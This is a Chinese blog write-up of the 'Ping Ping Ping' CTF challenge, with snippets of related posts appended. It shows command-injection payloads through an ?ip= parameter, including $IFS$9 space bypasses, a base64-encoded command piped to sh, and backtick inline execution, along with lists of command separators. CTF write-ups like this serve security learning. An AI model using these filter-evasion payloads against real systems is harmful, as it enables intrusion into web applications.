日常练习之web(Ping Ping Ping)

最新推荐文章于 2024-06-14 15:47:51 发布
最新推荐文章于 2024-06-14 15:47:51 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/doraemon12345/article/details/110182599
版权

打开题目是/?ip=
猜测应该是命令执行,先试一下?ip=127.0.0.1;cat flag
在这里插入图片描述发现过滤了空格,尝试?ip=127.0.0.1;ls
在这里插入图片描述发现flag.php,绕过空格

/?ip=127.0.0.1;cat$IFS$9flag.php
flag被过滤了,换一种方法先看看index.php
/?ip=127.0.0.1;cat$IFS$9index.php

在这里插入图片描述

发现bash也没了,不过可以用sh来执行
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
Y2F0IGZsYWcucGhw就是base64编码的cat flag.php
sh就是执行这个命令
在这里插入图片描述
拿到flag
后来看一些大师傅的wp时发现还有更好的解法
直接进行内联执行便可以得到结果
?ip=127.0.0.1;cat$IFS$9`ls`
内联就是把反引号里的输出内容作为执行的内容

云演CTF web题型 ping
cadandme的博客
01-19 2175
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1673
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
web页面实现ping 命令
02-02
在网页上实现ping命令,可以扩展到Tracert命令 在网页上实现ping命令,可以扩展到Tracert命令
网站的自动ping功能实现
05-23
ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令
Ping-Pong:用于创建乒乓球游戏的Javascript练习
04-17
首先,我们要明白JavaScript是Web开发中的主要脚本语言,它允许在浏览器端执行代码,为网页添加动态功能。在这个项目中,JavaScript将负责处理游戏的所有逻辑,包括球的运动、碰撞检测、得分计算以及用户输入的响应...
Epicodus JavaScript应用之Ping-Pong测试详解
它在Web开发中扮演着核心角色,是实现用户交互、数据操作、页面动态效果和网络通信的基础语言之一。在描述中提到的Ping-Pong场景,JavaScript可以用来处理用户输入、进行逻辑判断、与用户界面互动以及模拟网络通信等...
ping-pong-js
06-14
这个项目可能是Epicodus,一个知名的编程教育机构,为学员设计的一个练习任务,旨在帮助他们提升JavaScript技能,特别是与交互式应用开发相关的部分。 【描述】"Epicodus 应用程序的乒乓测试" 暗示了这个项目包含了...
学习Packet Tracer模拟器的基本使用,利用Packet Tracer进行拓扑布局和建立小型网络,使用 ping 命令测试本地协议栈、ping 网关以及 ping 远程主机。
最新发布
m0_58480257的博客
06-14 1108
在这些符号上移动鼠标指针时,设备组的名称将显示在中间的文本框中。当您单击这些符号的其中一个时,组中的特定设备就会显示在右边的框中。要求交换机之间互相连接线段,ping操作可以查看是否互相可以通信,通过这次实验我认识到交换机和pc,学习到如何配置IP地址,进行网络互通,完成局域网的搭建。特定的连接符号提供可用于连接设备的不同电缆类型。第一种特定的类型是金色的闪电,用于自动根据设备可用的接口选择连接类型。连接两个工作站上网卡的以太网端口。将电缆的一端连接到 PC1 上的 NIC 端口,另一端连接到 PC2。
BUUCTF Web pingpingping
CrotZZ的博客
07-03 537
打开后 没什么提示 试了下cat flag,空格好像是被过滤了 去空格,flag也被过滤 根据题目ping 所以得先ip=127.0.0.1返回结果是这样的 ls看有什么文件,flag已经被过滤 试了下一些绕过空格的方法,得到index.php里面的内容,虽然有些看不懂但大致意思还是明白,空格、bash、命令里是否有flag 都被过滤 这里是用了echo$IFS9Y2F0IGZsYWcucGhw∣base649Y2F0IGZsYWcucGhw|base649Y2F0IGZsYWcucGh
BUUCTF WEB ping ping ping
qq_41696858的博客
08-19 329
这题考的是有过滤的远程命令注入 判断很容易,?ip=127.0.0.1|ls 成功发现当前目录index.php和flag.php 下面就是读取了。尝试直接cat,当然不行?ip=127.0.0.1|cat flag.php 回显空格被过滤了,经过测试,管道符,{}都被过滤了,那么就是一个过waf问题了,多掌握几种绕过方式 这题的考点是$IFS,我之前也没接触了,看了这篇文章感觉茅塞顿开,感谢大佬 https://blog.youkuaiyun.com/Sacrifice_li/article/details/1088
web-[GXYCTF2019]Ping Ping Ping
wojiushilsy的博客
05-14 742
题目要点题目内容解题方法一:命令执行变量拼接方法二:过滤bash用sh执行方法三:内联执行(将反引号内命令的输出作为输入执行) 题目要点 linux常见绕过方法 $IFS$9(空格) 命令执行变量拼接 /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 过滤bash用sh执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 内联执行 将反引号内命令的输出作为输入执行 题目内容 解题 打开链接,提示 /?ip在url输入.
WEB】利用PING命令注入执行分析
HAPPY
08-17 9571
题目地址  https://www.mozhe.cn/bug/detail/RWpnQUllbmNaQUVndTFDWGxaL0JjUT09bW96aGUmozhe 资料 http://poetichacker.com/writeup/由iscc2018-web-ping学习命令注入.html 姿势  命令连接符 command1 &amp;&amp; command2   先执行...
ctf-web-unseping解题思路
m0_73734159的博客
05-13 1147
这道题解题的关键就在于PHP序列化。
攻防世界—Web新手题
Karry_xk的博客
12-22 221
场景:command_execution 难度系数:2.0 题目来源: Cyberpeace-n3k0 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目场景:http://220.249.52.134:56092 问题描述: 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 解决方案: 先尝试输入本地IP: ping -c 3 127.0.0.1 PING 127.0.0.1 (127.0.0.1) 56(84) b
攻防世界web刷题记录2
m0_73239569的博客
04-21 1075
通过ping命令,用户可以判断两台计算机之间的网络连接是否正常,如果计算机之间的网络连接正常,它们应该能够在规定的时间内收到和回复对方的数据包;反序列化又叫对象注入,序列化在内部没有漏洞,漏洞产生是应该程序在处理对象、魔术函数以及序列化 相关的问题导致的 当传给 unserialize()的参数可控时,那么用户就可以注入 payload,进行反序列化的时 候就可能触发对象中的一些魔术方法。FILE(S) 是要列出的文件或目录的名称,也可以是通配符表达式,用于匹配符合特定模式的所有文件和目录。
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 8325
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 3017
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值